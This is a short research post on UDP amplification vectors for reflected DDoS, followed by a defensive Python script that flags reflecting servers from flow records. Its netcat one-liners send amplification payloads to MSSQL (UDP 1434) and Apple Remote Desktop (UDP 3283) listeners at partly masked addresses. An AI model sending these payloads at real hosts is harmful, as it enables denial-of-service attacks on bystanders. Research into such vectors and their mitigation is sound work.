Oct 12, 2022

Amplification Research

AMP-Research is research into exotic UDP/TCP amplification vectors, payloads and mitigations.

Amplification occurs when a simple malformed socket or packet request elicits a response larger than the input data. This can be abused to "amplify" a request by means of Distributed Reflected Denial of Service (DRDoS) or DDoS attacks.

The best way to show what this means is to use the MSSQL network protocol over TCP/IP on UDP port 1434 (23 times amplification factor) as an example.

$ echo -ne '\x02' | nc -u -q 2 190.xx.xx.xx 1434|xxd -p|wc -c
629 bytes

Another example on ARD (Apple Remote Desktop) listener:

$ echo -ne '\x00\x14\x00\x01\x03' |nc -u 89.xx.xx.xx 3283|hexdump
0000000 0100 ea03 3100 0000 0000 0000 0000 0000
0000010 0000 0000 0000 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 0100 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 0000 0000
*
0000050 0000 1200 0000 0000 0000 0000 0000 0000
0000060 0000 0000 0000 0000 0000 0000 0000 0000
0000070 0000 0000 0000 0000 0000 0000 0000 640a
0000080 7461 6861 6565 6472 0034 0000 0000 0000
0000090 0000 0000 0000 0000 0000 0000 0000 0000
*
00000c0 0000 0001 0000 0000 0000 0000 0000 0000
00000d0 0000 0000 0000 9803 0000 0100 18f0 ed98
00000e0 9288 0000 0000 0a00 6400 6100 7400 6100
00000f0 6800 6500 6500 7200 6400 3400 0000 0000
0000100 0000 0000 0000 0000 0000 0000 0000 0000
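
The same ratio seen from the defender's side, as an added example that is not part of the original project: it sums request and response bytes per service from flow records and flags hosts on UDP 1434 or 3283 that send out far more than they receive. The flow tuple layout, addresses, byte counts and thresholds are constructed assumptions.

```python
from collections import defaultdict

# UDP ports of the two services shown above.
WATCHED_PORTS = {1434: "MSSQL", 3283: "ARD"}

# Constructed flow records: (src_ip, src_port, dst_ip, dst_port, payload_bytes).
# Addresses come from documentation ranges; byte counts are illustrative only.
SAMPLE_FLOWS = [
    ("198.51.100.7", 40000, "192.0.2.10", 1434, 1),
    ("192.0.2.10", 1434, "198.51.100.7", 40000, 310),
    ("198.51.100.7", 40001, "192.0.2.10", 1434, 1),
    ("192.0.2.10", 1434, "198.51.100.7", 40001, 310),
    ("203.0.113.5", 51000, "192.0.2.20", 3283, 5),
    ("192.0.2.20", 3283, "203.0.113.5", 51000, 1006),
    ("203.0.113.9", 52000, "192.0.2.30", 53, 60),   # port not watched
    ("192.0.2.30", 53, "203.0.113.9", 52000, 90),
]


def amplification_by_service(flows, watched=WATCHED_PORTS):
    """Return {(server_ip, port): (bytes_in, bytes_out, ratio)} for watched ports."""
    totals = defaultdict(lambda: [0, 0])
    for src_ip, src_port, dst_ip, dst_port, size in flows:
        if dst_port in watched:        # request arriving at the service
            totals[(dst_ip, dst_port)][0] += size
        elif src_port in watched:      # response leaving the service
            totals[(src_ip, src_port)][1] += size
    result = {}
    for key, (bytes_in, bytes_out) in totals.items():
        # Responses with no recorded request (reflected traffic reaching a
        # victim, or a one-sided capture) get an infinite ratio.
        ratio = bytes_out / bytes_in if bytes_in else float("inf")
        result[key] = (bytes_in, bytes_out, ratio)
    return result


def flag_reflectors(flows, min_ratio=10.0, min_bytes_out=500):
    """List (ip, port) services that answer with far more bytes than they receive."""
    stats = amplification_by_service(flows)
    return sorted(key for key, (_, out, ratio) in stats.items()
                  if ratio >= min_ratio and out >= min_bytes_out)


if __name__ == "__main__":
    for (ip, port), (b_in, b_out, ratio) in amplification_by_service(SAMPLE_FLOWS).items():
        print(f"{ip}:{port} ({WATCHED_PORTS[port]}) in={b_in} out={b_out} ratio={ratio:.1f}")
    print("flagged:", flag_reflectors(SAMPLE_FLOWS))
```

Hosts flagged here are candidates for filtering or rate limiting on the listed UDP ports at the network edge.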


Links: